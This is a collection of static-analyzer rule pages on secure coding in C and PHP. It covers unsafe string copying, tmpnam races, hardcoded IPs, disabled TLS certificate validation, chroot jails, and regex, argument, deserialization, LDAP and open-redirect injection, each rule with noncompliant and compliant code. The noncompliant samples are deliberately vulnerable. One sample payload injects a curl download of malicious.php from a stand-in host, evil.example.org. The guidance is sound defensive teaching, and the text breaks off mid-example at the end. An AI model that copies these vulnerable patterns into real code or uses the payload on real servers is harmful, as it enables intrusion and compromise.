  • C11 provides, in its annex K, the strncpy_s and wcsncpy_s functions that were designed as safer alternatives to strncpy and wcsncpy. It is not recommended to use them in all circumstances, because they introduce a runtime overhead and require writing more code for error handling, but they perform checks that will limit the consequences of calling the function with bad arguments.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions
  • If you are using strncpy and wcsncpy as safer versions of strcpy and wcscpy, you should instead consider strcpy_s and wcscpy_s, because these functions have several shortcomings:
    • It’s not easy to detect truncation
    • Too much work is done to fill the buffer with 0, leading to suboptimal performance
    • Unless manually corrected, the dest string might not be null-terminated
  • If you want to use the strncpy and wcsncpy functions and detect if the string was truncated, the pattern is the following:
    • Set the last character of the buffer to null
    • Call the function
    • Check if the last character of the buffer is still null
  • If you are writing C++ code, using std::string to manipulate strings is much simpler and less error-prone
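The sentinel pattern above can be wrapped in a small reusable helper. This is a minimal sketch; the helper name copy_checked is hypothetical:

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Sketch of the set-call-check pattern described above; copy_checked is a
   hypothetical name. On truncation, dest is NOT null-terminated, which the
   false return value signals to the caller. */
bool copy_checked(char *dest, size_t dest_size, const char *src) {
    dest[dest_size - 1] = '\0';         /* 1. set the last character to null */
    strncpy(dest, src, dest_size);      /* 2. call the function */
    return dest[dest_size - 1] == '\0'; /* 3. check it is still null */
}
```

The caller can then handle truncation explicitly instead of silently working with a cut-off, unterminated buffer.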

Sensitive Code Example

int f(char *src) {
  char dest[256];
  strncpy(dest, src, sizeof(dest)); // Sensitive: might silently truncate
  return doSomethingWith(dest);
}

Compliant Solution

int f(char *src) {
  char dest[256];
  dest[sizeof dest - 1] = 0;
  strncpy(dest, src, sizeof(dest)); // Compliant
  if (dest[sizeof dest - 1] != 0) {
    // Handle error
  }
  return doSomethingWith(dest);
}

See

c:S5815

In C, a string is just a buffer of characters, normally using the null character as a sentinel for the end of the string. This means that the developer has to be aware of low-level details such as buffer sizes or having an extra character to store the final null character. Doing that correctly and consistently is notoriously difficult and any error can lead to a security vulnerability, for instance, giving access to sensitive data or allowing arbitrary code execution.

The function char *strncat(char *restrict dest, const char *restrict src, size_t count); appends at most count characters from src to the end of dest and then appends a null character, so dest is always null-terminated. The wcsncat function does the same for wide characters and should be used with the same guidelines.

Ask Yourself Whether

  • There is a possibility that either the src or the dest pointer is null
  • The current string length of dest, plus the current string length of src, plus 1 (for the final null character) is larger than the size of the buffer pointed to by dest
  • There is a possibility that either string is not correctly null-terminated

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • C11 provides, in its annex K, the strncat_s and the wcsncat_s functions, which were designed as safer alternatives to strncat and wcsncat. Using them in all circumstances is not recommended, because they introduce a runtime overhead and require additional error-handling code, but they perform checks that will limit the consequences of calling the function with bad arguments.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions
  • If you are using strncat and wcsncat as safer versions of strcat and wcscat, you should instead consider strcat_s and wcscat_s, because strncat and wcsncat have several shortcomings:
    • It’s not easy to detect truncation
    • The count parameter is error-prone
    • Computing the count parameter typically requires computing the string length of dest, at which point other simpler alternatives exist
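To illustrate computing the count correctly, the remaining space in dest can be derived from its current length. This is a minimal sketch; the helper name append_bounded is an assumption:

```c
#include <stddef.h>
#include <string.h>

/* Sketch: deriving the strncat count from the space remaining in dest.
   The helper name append_bounded is hypothetical. It requires dest to
   already hold a null-terminated string shorter than dest_size. */
char *append_bounded(char *dest, size_t dest_size, const char *src) {
    size_t used = strlen(dest);
    strncat(dest, src, dest_size - used - 1); /* -1 for the final null */
    return dest;
}
```

Note that once strlen(dest) has been computed, snprintf(dest + used, dest_size - used, "%s", src) is often the simpler alternative hinted at above, and its return value also reveals truncation.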

Sensitive Code Example

int f(char *src) {
  char dest[256];
  strcpy(dest, "Result: ");
  strncat(dest, src, sizeof dest); // Sensitive: passing the buffer size instead of the remaining size
  return doSomethingWith(dest);
}

Compliant Solution

int f(char *src) {
  char result[] = "Result: ";
  char dest[256];
  strcpy(dest, result);
  strncat(dest, src, sizeof dest - sizeof result); // Compliant but may silently truncate
  return doSomethingWith(dest);
}

See

c:S5824

The functions "tmpnam", "tmpnam_s" and "tmpnam_r" all return a file name that does not match an existing file, so that the application can create a temporary file. However, even if the file did not exist at the time one of these functions was called, it might exist by the time the application tries to use the name to create the file. Attackers have exploited this race window to gain access to files that the application believed were trustworthy.

There are alternative functions that, in addition to creating a suitable file name, create and open the file and return the file handler. Such functions are protected from this attack vector and should be preferred. About the only reason to use these functions would be to create a temporary folder, not a temporary file.

Additionally, these functions might not be thread-safe, and if the buffers you provide are too small, a buffer overflow will occur.

Ask Yourself Whether

  • There is a possibility that several threads call any of these functions simultaneously
  • There is a possibility that the resulting file is opened without forcing its creation, meaning that it might have unexpected access rights
  • The buffers passed to these functions are respectively smaller than
    • L_tmpnam for tmpnam
    • L_tmpnam_s for tmpnam_s
    • L_tmpnam for tmpnam_r

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a function that directly opens the temporary file, such as tmpfile, tmpfile_s, mkstemp, or mkstemps (the last two allow finer control of the file name).
  • If you can’t get rid of these functions, when using the generated name to open the file, use a function that forces the creation of the file and fails if the file already exists.
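As a sketch of the first recommendation, mkstemp (POSIX) both generates a unique name and atomically creates and opens the file with restrictive permissions, closing the race window left by tmpnam. The template path below is an illustration:

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Sketch (POSIX, assumed available): mkstemp atomically creates and opens
   a unique file. The template path is an illustrative assumption. */
int open_temp_file(void) {
    char path[] = "/tmp/app-XXXXXX"; /* the trailing XXXXXX is mandatory */
    int fd = mkstemp(path);          /* created with mode 0600, exclusively */
    if (fd == -1) {
        perror("mkstemp");
        return -1;
    }
    unlink(path); /* optional: the file disappears once the descriptor is closed */
    return fd;
}
```

Because the file is created and opened in a single step, no other process can slip a file (or symlink) in under the chosen name between name generation and file creation.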

Sensitive Code Example

void f(char *tempData) {
  char *path = tmpnam(NULL); // Sensitive
  FILE* f = fopen(path, "w");
  fputs(tempData, f);
  fclose(f);
}

Compliant Solution

void f(char *tempData) {
  // The file is opened in "wb+" mode and is automatically removed on normal program exit
  FILE* f = tmpfile(); // Compliant
  fputs(tempData, f);
  fclose(f);
}

See

c:S1313

Hardcoding IP addresses is security-sensitive and has led to vulnerabilities in the past.

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time the address changes, instead of having an operations team update a configuration file.
  • It forces the same address to be used in every environment (dev, sys, qa, prod).

Last but not least, it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks are always possible, but when the IP address is hardcoded, solving the issue takes more time, which increases an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • It gives an attacker information about the network topology.
  • It is a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code; instead, make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentiality is not required, a domain name can be used, since it allows the destination to be changed quickly without rebuilding the software.
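A minimal sketch of this approach in C, assuming a hypothetical DB_HOST environment variable with a localhost fallback for development:

```c
#include <stdlib.h>

/* Sketch: resolving the host from the environment instead of hardcoding it.
   The DB_HOST variable name and the localhost fallback are assumptions
   chosen for illustration. */
const char *database_host(void) {
    const char *host = getenv("DB_HOST");
    return host != NULL ? host : "localhost"; /* development default */
}
```

The returned value could then be passed to dbi_conn_set_option in place of the hardcoded literal, letting operations change the address without a rebuild.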

Sensitive Code Example

dbi_conn conn = dbi_conn_new("mysql");
string host = "10.10.0.1"; // Sensitive
dbi_conn_set_option(conn, "host", host.c_str());
dbi_conn_set_option(conn, "host", "10.10.0.1"); // Sensitive

Compliant Solution

dbi_conn conn = dbi_conn_new("mysql");
string host = getDatabaseHost(); // Compliant
dbi_conn_set_option(conn, "host", host.c_str()); // Compliant

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849

See

c:S4830

This vulnerability makes it possible for encrypted communications to be intercepted.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. The role of certificate validation in this process is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When certificate validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable certificate validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate certificates, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

Loss of data integrity

When TLS certificate validation is disabled, the integrity of the data you send and receive cannot be guaranteed. An attacker could modify the data in transit, and you would have no way of knowing. This could range from subtle manipulations of the data you receive to the injection of malicious code or malware into your system. The consequences of such breaches of data integrity can be severe, depending on the nature of the data and the system.

How to fix it in Botan

Code examples

The following code contains examples of disabled certificate validation.

Certificate validation is disabled by overriding tls_verify_cert_chain with an empty implementation. It is highly recommended to keep the original implementation.

Noncompliant code example

#include <botan/tls_client.h>
#include <botan/tls_callbacks.h>
#include <botan/tls_session_manager.h>
#include <botan/tls_policy.h>
#include <botan/auto_rng.h>
#include <botan/certstor.h>
#include <botan/certstor_system.h>

class Callbacks : public Botan::TLS::Callbacks
{
    virtual void tls_verify_cert_chain(
              const std::vector<Botan::X509_Certificate> &cert_chain,
              const std::vector<std::shared_ptr<const Botan::OCSP::Response>> &ocsp_responses,
              const std::vector<Botan::Certificate_Store *> &trusted_roots,
              Botan::Usage_Type usage,
              const std::string &hostname,
              const Botan::TLS::Policy &policy)
    override  { }
};

class Client_Credentials : public Botan::Credentials_Manager { };

void connect() {
    Callbacks callbacks;
    Botan::AutoSeeded_RNG rng;
    Botan::TLS::Session_Manager_In_Memory session_mgr(rng);
    Client_Credentials creds;
    Botan::TLS::Strict_Policy policy;

    Botan::TLS::Client client(callbacks, session_mgr, creds, policy, rng,
                              Botan::TLS::Server_Information("example.com", 443),
                              Botan::TLS::Protocol_Version::TLS_V12); // Noncompliant
}

Compliant solution

#include <botan/tls_client.h>
#include <botan/tls_callbacks.h>
#include <botan/tls_session_manager.h>
#include <botan/tls_policy.h>
#include <botan/auto_rng.h>
#include <botan/certstor.h>
#include <botan/certstor_system.h>

class Callbacks : public Botan::TLS::Callbacks { };

class Client_Credentials : public Botan::Credentials_Manager { };

void connect() {
    Callbacks callbacks;
    Botan::AutoSeeded_RNG rng;
    Botan::TLS::Session_Manager_In_Memory session_mgr(rng);
    Client_Credentials creds;
    Botan::TLS::Strict_Policy policy;

    Botan::TLS::Client client(callbacks, session_mgr, creds, policy, rng,
                              Botan::TLS::Server_Information("example.com", 443),
                              Botan::TLS::Protocol_Version::TLS_V12);
}

How does this work?

Addressing the vulnerability of disabled TLS certificate validation primarily involves re-enabling the default validation.

To avoid running into problems with invalid certificates, consider the following sections.

Using trusted certificates

If possible, always use a certificate issued by a well-known, trusted CA for your server. Most programming environments come with a predefined list of trusted root CAs, and certificates issued by these authorities are validated automatically. This is the best practice, and it requires no additional code or configuration.

Working with self-signed certificates or non-standard CAs

In some cases, you might need to work with a server using a self-signed certificate, or a certificate issued by a CA not included in your trusted roots. Rather than disabling certificate validation in your code, you can add the necessary certificates to your trust store.

Resources

Documentation

Standards

c:S5801

In C, a string is just a buffer of characters, normally using the null character as a sentinel for the end of the string. This means that the developer has to be aware of low-level details such as buffer sizes or having an extra character to store the final null character. Doing that correctly and consistently is notoriously difficult and any error can lead to a security vulnerability, for instance, giving access to sensitive data or allowing arbitrary code execution.

The function char *strcpy(char * restrict dest, const char * restrict src); copies the characters from src to dest, including the terminating null character. The wcscpy function does the same for wide characters and should be used with the same guidelines.

Note: the functions strncpy and wcsncpy might look like attractive safe replacements for strcpy and wcscpy, but they have their own set of issues (see S5816), and you should probably prefer another more adapted alternative.

Ask Yourself Whether

  • There is a possibility that either the source or the destination pointer is null
  • There is a possibility that the source string is not correctly null-terminated, or that its length (including the final null character) can be larger than the size of the destination buffer.
  • There is an overlap between source and destination

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • C11 provides, in its annex K, the strcpy_s and the wcscpy_s functions, which were designed as safer alternatives to strcpy and wcscpy. Using them in all circumstances is not recommended, because they introduce a runtime overhead and require additional error-handling code, but they perform checks that will limit the consequences of calling the function with bad arguments.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions, for example, strlcpy in FreeBSD
  • If you are writing C++ code, using std::string to manipulate strings is much simpler and less error-prone
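If neither annex K nor strlcpy is available, snprintf can serve as a portable bounded copy that always null-terminates and makes truncation detectable. This is a sketch; the helper name copy_string is hypothetical:

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* Sketch: snprintf as a portable bounded copy. For dest_size > 0 it always
   null-terminates dest, and its return value (the length src would need)
   makes truncation detectable. The name copy_string is hypothetical. */
bool copy_string(char *dest, size_t dest_size, const char *src) {
    int needed = snprintf(dest, dest_size, "%s", src);
    return needed >= 0 && (size_t)needed < dest_size; /* true if it fit */
}
```

Unlike strncpy, this does not zero-fill the unused remainder of the buffer, avoiding the performance concern mentioned in S5816.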

Sensitive Code Example

int f(char *src) {
  char dest[256];
  strcpy(dest, src); // Sensitive: might overflow
  return doSomethingWith(dest);
}

Compliant Solution

int f(char *src) {
  char *dest = malloc(strlen(src) + 1); // +1 for the final null character
  if (dest == NULL) {
    return -1; // Handle allocation failure
  }
  strcpy(dest, src); // Compliant: the buffer is guaranteed to be large enough
  int r = doSomethingWith(dest);
  free(dest);
  return r;
}

See

c:S5802

The purpose of creating a jail, the "virtual root directory" created with chroot-type functions, is to limit access to the file system by isolating the process inside this jail. However, many chroot implementations do not modify the current working directory, so the process still has access to unauthorized resources outside of the "jail".

Ask Yourself Whether

  • The application changes the working directory before or after running chroot.
  • The application uses a path inside the jail directory as working directory.

There is a risk if you answered no to any of those questions.

Recommended Secure Coding Practices

Change the current working directory to the root directory after switching to a jail directory.

Sensitive Code Example

The current directory is not changed with the chdir function before or after the creation of a jail with the chroot function:

const char* root_dir = "/jail/";
chroot(root_dir); // Sensitive: no chdir before or after chroot, and missing check of return value

The chroot or chdir operations could fail, leaving the process with access to unauthorized resources. The return code should be checked:

const char* root_dir = "/jail/";
chroot(root_dir); // Sensitive: missing check of the return value
const char* any_dir = "/any/";
chdir(any_dir); // Sensitive: missing check of the return value

Compliant Solution

To correctly isolate the application into a jail, change the current directory with chdir before the chroot and check the return code of both functions:

const char* root_dir = "/jail/";

if (chdir(root_dir) == -1) {
  exit(-1);
}

if (chroot(root_dir) == -1) {  // compliant: the current dir is changed to the jail and the results of both functions are checked
  exit(-1);
}

See

phpsecurity:S2631

Why is this an issue?

Regular expression injections occur when the application retrieves untrusted data and uses it as a regex to pattern match a string with it.

Most regular expression engines use backtracking to try all possible execution paths of the regex when evaluating an input. In some cases this can lead to severe performance problems, referred to as catastrophic backtracking.

What is the potential impact?

In the context of a web application vulnerable to regex injection:
After discovering the injection point, attackers insert data into the vulnerable field to make the affected component inaccessible.

Depending on the application’s software architecture and the injection point’s location, the impact may or may not be visible.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Self Denial of Service

In cases where the complexity of the regular expression is exponential to the input size, a small, carefully-crafted input (for example, 20 chars) can trigger catastrophic backtracking and cause a denial of service of the application.

Super-linear regex complexity can produce the same effects for a large, carefully crafted input (thousands of chars).

If the component jeopardized by this vulnerability is not a bottleneck that acts as a single point of failure (SPOF) within the application, the denial of service might only affect the attacker who initiated it.

Such benign denial of service can also occur in architectures that rely heavily on containers and container orchestrators. Replication systems would detect the failure of a container and automatically replace it.

Infrastructure SPOFs

However, a denial of service attack can be critical to the enterprise if it targets a SPOF component. Sometimes the SPOF is a software architecture vulnerability (such as a single component on which multiple critical components depend) or an operational vulnerability (for example, insufficient container creation capabilities or failures from containers to terminate).

In either case, attackers aim to exploit the infrastructure weakness by sending as many malicious payloads as possible, using potentially huge offensive infrastructures.

These threats are particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

How to fix it in Core PHP

Code examples

The following noncompliant code is vulnerable to Regex Denial of Service (ReDoS) because untrusted data is used as a regex to scan a string without prior sanitization or validation.

Noncompliant code example

function lookup(string $data): bool {
  $regex = $_GET["regex"];
  return preg_match($regex, $data); // Noncompliant
}

Compliant solution

function lookup(string $data): bool {
  $regex = $_GET["regex"];
  return preg_match('/' . preg_quote($regex, '/') . '/', $data);
}

How does this work?

Sanitization and Validation

Escaping metacharacters with native functions is one defense against regex injection.
The escape function sanitizes the input so that the regular expression engine interprets these characters literally.

An allowlist approach can also be used by creating a list containing authorized and secure strings you want the application to use in a query.
If a user input does not match an entry in this list, it should be considered unsafe and rejected.

Important Note: The application must sanitize and validate input on the server side, not only in the client-side front end.

Where possible, use non-backtracking regex engines, for example, Google’s re2.

In the compliant solution, preg_quote escapes metacharacters and escape sequences that could have broken the initially intended logic.

Resources

Articles & blog posts

Standards

phpsecurity:S5883

Why is this an issue?

OS command argument injections occur when applications execute operating system commands built from untrusted data, but the untrusted data is limited to the command’s arguments.
It is not possible to directly inject arbitrary commands that compromise the underlying operating system, but the behavior of the executed command can still be influenced in ways that expand access, up to the execution of arbitrary commands. The security of the application therefore depends on the behavior of the program that is executed.

What is the potential impact?

An attacker exploiting an argument injection vulnerability is able to add arbitrary arguments to a system binary call. Depending on the command the arguments are added to, this might lead to arbitrary command execution.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Core PHP

Code examples

The following code uses the find command and expects the user to enter the name of a file to find on the system.

It is vulnerable to argument injection because untrusted data is inserted in the arguments of a process call without prior validation or sanitization.
Here, the application ignores that a user-submitted parameter might contain special characters that will tamper with the expected system command behavior.

In this particular case, an attacker might add arbitrary arguments to the find command for malicious purposes. For example, the following payload will download malicious software on the application’s hosting server.

 -exec curl -o /var/www/html/ http://evil.example.org/malicious.php ;

Other standard PHP functions are susceptible to the same vulnerable behavior. In particular, the mail function accepts, as its fifth argument, parameters that are appended to the command line of the configured mail-sending program. This might lead to a similar exploitation scenario.

Noncompliant code example

$arg=$_GET['file'];
echo "<h1>File search results:</h1><br/>";
$cmd=escapeshellcmd('find /tmp/images -iname ' . $arg);
passthru($cmd);
$arg=$_GET['arg'];
echo "<h1>Sending test mail.</h1><br/>";
mail("mail@example.org", "example subject", "Example", [], $arg);

Compliant solution

$arg=$_GET['file'];
echo "<h1>File search results:</h1><br/>";
$cmd='find /tmp/images -iname ' . escapeshellarg($arg);
passthru($cmd);
$arg=$_GET['arg'];
echo "<h1>Sending test mail.</h1><br/>";

$allowed_args_mapping = ["-n","-v"];
if (! in_array($arg, $allowed_args_mapping, true)) {
	$arg = "";
}
mail("mail@example.org", "example subject", "Example", [], $arg);

How does this work?

Allowing users to insert data in operating system commands generally creates more problems than it solves.

Anything that can be done via operating system commands can usually be done via a language’s native SDK.
Therefore, our suggestion is to avoid using OS commands in the first place.

When building a system command from user-submitted data is unavoidable, using the escapeshellarg sanitizing function should be preferred. It ensures that the provided data will be considered a single argument and prevents the injection of subsequent ones.

It is also important not to combine both escapeshellarg and escapeshellcmd. Indeed, a call to escapeshellcmd on a complete command line will void any escaping previously added with escapeshellarg.

Therefore, it is impossible to prevent an argument injection issue in the mail function with escapeshellarg. Indeed, mail internally relies on escapeshellcmd for escaping purposes. In that case, an allowlist of explicitly trusted additional arguments should be used.

Resources

Documentation

Standards

phpsecurity:S5135

Why is this an issue?

Deserialization injections occur when applications deserialize wholly or partially untrusted data without verification.

What is the potential impact?

In the context of a web application performing unsafe deserialization:
After detecting the injection vector, attackers inject a carefully-crafted payload into the application.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Application-specific attacks

In this scenario, the attackers succeed in injecting an object of the expected class, but with malicious properties that affect the object’s behavior.

If the application relies on the properties of the deserialized object, attackers can modify the data structure or content to escalate privileges or perform unwanted actions.
In the context of an e-commerce application, this could be changing the number of products or prices.

Full application compromise

In the worst-case scenario, the attackers succeed in injecting an object of a completely different class than expected, triggering code execution.

Depending on the attacker, code execution can be used with different intentions:

  • Download the internal server’s data, most likely to sell it.
  • Modify data, install malware, for instance, malware that mines cryptocurrencies.
  • Stop services or exhaust resources, for instance, with fork bombs.

This threat is particularly insidious if the attacked organization does not maintain a Disaster Recovery Plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker additionally manages to elevate their privileges to an administrative level and attack other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised through a combination of unsafe deserialization and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Core PHP

Code examples

The following code is vulnerable to deserialization attacks because it deserializes HTTP data without validating it first.

Noncompliant code example

$cookie = $_COOKIE['session'];
$session = unserialize($cookie); // Noncompliant

echo $session->auth ? "OK" : "KO";

Compliant solution

$cookie = $_COOKIE['session'];
list($session, $mac) = explode('|', $cookie, 2);
$hash = hash_hmac("sha256", $session, $KEY);

if (hash_equals($hash, $mac)) {
    $session = unserialize($session);
} else {
    die;
}

echo $session->auth ? "OK" : "KO";

How does this work?

Allowing users to provide data for deserialization generally creates more problems than it solves.

Anything that can be done through deserialization can generally be done with more secure data structures.
Therefore, our first suggestion is to avoid deserialization in the first place.

However, if deserialization mechanisms are valid in your context, here are some security suggestions.

More secure serialization methods

Some more secure serialization methods reduce the risk of security breaches, although not definitively.

A complete object serializer is probably unnecessary if you only need to receive primitive data (for example integers, strings, bools, etc.).
In this case, formats such as JSON and XML protect the application from deserialization attacks by default.

For more complex objects, the next step is to control which class fields are exposed by creating class-specific serialization methods.
The most common method is to use Data Transfer Objects (DTO) patterns or Google Protocol Buffers (protobufs). After creating the Protobuf data structure, the Protobuf compiler creates class files that handle operations such as serializing and deserializing data.

Integrity check

Message authentication codes (MAC) can be used to prevent tampering with serialized data that is meant to be stored outside the application server:

  • On the server-side, when serializing an object, compute a MAC of the result and append it to the serialized object string.
  • When the serialized value is submitted back, verify the serialization string MAC on the server side before deserialization.

Depending on the situation, two MAC computation modes can be used.

If the same application will be responsible for the MAC computing and validation, a symmetric signature algorithm can be used. In that case, HMAC should be preferred, with a strong underlying hash algorithm such as SHA-256.

If multiple parties have to validate the serialized data, an asymmetric signature algorithm should be used. This reduces the chances of a signing secret being leaked. In that case, the RSASSA-PSS algorithm can be used.

Note: Be sure to store the signing secret securely.

Here, the compliant code example uses the hash_hmac function to compute the integrity tag of the untrusted data. The underlying hash algorithm is set to sha256, which is considered strong for this use case.

Pre-Approved classes

As a last resort, create a list of approved and safe classes that the application should be able to deserialize.
If the untrusted class does not match an entry in this list, it should be rejected because it is considered unsafe.

Note: Untrusted classes should be filtered out during deserialization, not after.
Depending on the language or framework, this should be possible by overriding the serialization process or using native capabilities to restrict type deserialization.

Pitfalls

Non-constant time authenticity checks

When using a MAC to validate the authenticity of an untrusted serialized string, it is important to rely on constant time implementations. Indeed, in most cases, classical string equality check operators work lazily. As soon as a difference is found between two strings, they consider them different and return. Their response time will therefore vary depending on where the first difference has been found.

In security-sensitive contexts, this difference in execution time leaks information about the secret value being compared. It allows for timing attacks that could defeat the authenticity check.

The compliant code example uses the hash_equals function to compare authentication tags, which benefits from a constant-time implementation.

Resources

Standards

phpsecurity:S2078

Why is this an issue?

LDAP injections occur in an application when the application retrieves untrusted data and inserts it into an LDAP query without sanitizing it first.

An LDAP injection can be either basic or blind, depending on whether the data fetched from the server is directly returned in the web application’s response.
Even when the application returns no visible response for the malicious request, exploitation remains possible, so blind injections must be treated the same way as basic LDAP injections.

What is the potential impact?

In the context of a web application vulnerable to LDAP injection: after discovering the injection point, attackers insert data into the vulnerable field to execute malicious LDAP commands.

The impact of this vulnerability depends on how vital LDAP servers are to the organization.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Data leakage or corruption

In typical scenarios where systems perform innocuous LDAP operations to find users or create inventories, an LDAP injection could result in data leakage or corruption.

Privilege escalation

A malicious LDAP query could allow an attacker to impersonate a low-privileged user or an administrator in scenarios where systems perform authorization checks or authentication.

Attackers use this vulnerability to gain multiple footholds in target organizations by collecting authentication bypasses.

How to fix it in Core PHP

Code examples

The following noncompliant code is vulnerable to LDAP injection because untrusted data is concatenated to an LDAP query without prior sanitization or validation.

Noncompliant code example

$ldapconn = ldap_connect("localhost");

if($ldapconn){
  $user = $_GET["user"];

  $filter = "(&(objectClass=user)(uid=" . $user . "))";
  $dn = "dc=example,dc=org";

  ldap_list($ldapconn, $dn, $filter); // Noncompliant
}

Compliant solution

$ldapconn = ldap_connect("localhost");

if($ldapconn){
  $user = ldap_escape($_GET["user"], "", LDAP_ESCAPE_FILTER);

  $filter = "(&(objectClass=user)(uid=" . $user . "))";
  $dn = "dc=example,dc=org";

  ldap_list($ldapconn, $dn, $filter);
}

How does this work?

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of the initially intended logic.

For LDAP injection, the cleanest way to do so is to use parameterized queries, if they are available for your use case.

Another approach is to sanitize the input before using it in an LDAP query. Input sanitization should be primarily done using native libraries.

Alternatively, validation can be implemented using an allowlist approach by creating a list of authorized and secure strings you want the application to use in a query. If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Important note: The application must sanitize and validate on the server side, not in client-side front-ends.

The most fundamental security mechanism is the restriction of LDAP metacharacters.

For Distinguished Names (DN), special characters that need to be escaped include:

  • \
  • #
  • +
  • <
  • >
  • ,
  • ;
  • "
  • =

For Search Filters, special characters that need to be escaped include:

  • *
  • (
  • )
  • \
  • null

For PHP, the core library function ldap_escape allows sanitizing these characters.

In the compliant solution example, the ldap_escape function is used with the LDAP_ESCAPE_FILTER flag, which sanitizes potentially malicious characters in the search filter. The function can also be used with the LDAP_ESCAPE_DN flag, which sanitizes the distinguished name (DN).

Resources

Standards

phpsecurity:S5146

Why is this an issue?

Open redirection occurs when an application uses user-controllable data to redirect users to a URL.

An attacker with malicious intent could manipulate a user into browsing to a specially crafted URL, such as https://trusted.example.com?url=evil.example.com, in order to redirect the victim to a domain under the attacker’s control.

Tricking users into sending the malicious HTTP request is usually the main task in exploiting an open redirection. It often requires the attacker to build a credible pretext to avoid arousing the victim’s suspicion.

Attackers commonly use open redirect exploits in mass phishing campaigns.

What is the potential impact?

If an attacker tricks a user into opening a carefully chosen link, the user is redirected to a domain the attacker controls.

From then on, the attacker can perform various malicious actions, some more impactful than others.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Domain Mirroring

A malicious link redirects to an attacker’s controlled website mirroring the interface of a web application trusted by the user. Due to the similarity in the application appearance and the apparently trustable clicked hyperlink, the user struggles to identify that they are browsing on a malicious domain.

Depending on the attacker’s purpose, the malicious website can leak credentials, bypass Multi-Factor Authentication (MFA), and reach any authenticated data or action.

Malware Distribution

A malicious link redirects to an attacker’s controlled website that serves malware. On the same basis as the domain mirroring exploitation, the attacker develops a spearphishing or phishing campaign with a carefully crafted pretext that would result in the download and potential execution of a hosted malicious file.
The worst-case scenario could result in complete system compromise.

How to fix it in Core PHP

Code examples

The following noncompliant code example is vulnerable to open redirection as it constructs a URL with user-controllable data. This URL is then used to redirect the user without being first validated. An attacker can leverage this to manipulate users into performing unwanted redirects.

Noncompliant code example

$url=$_GET['url'];

header("Location: " . $url); // Noncompliant

Compliant solution

$url=$_GET['url'];

$allowedUrls = ['https://example.com/'];

if(in_array($url, $allowedUrls, true)){
  header("Location: " . $url);
}

How does this work?

Built-in framework methods should be preferred because, more often than not, they provide additional security mechanisms. However, these built-in methods are usually engineered for internal page redirections, so they might not fit every use case.

In case the application strictly requires external redirections based on user-controllable data, this could be done using the following alternatives:

  1. Validating the authority part of the URL against a statically defined value (see Pitfalls).
  2. Using an allow-list approach in case the destination URLs are multiple but limited.
  3. Adding a customized page to which users are redirected, warning about the imminent action and requiring manual authorization to proceed.
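Alternative 1 can be sketched with a small validation helper; the function name and the trusted host are assumptions for illustration:

```php
<?php
// Hypothetical helper: validate the URL authority against a statically
// defined scheme and host before redirecting.
function isAllowedRedirect(string $url): bool
{
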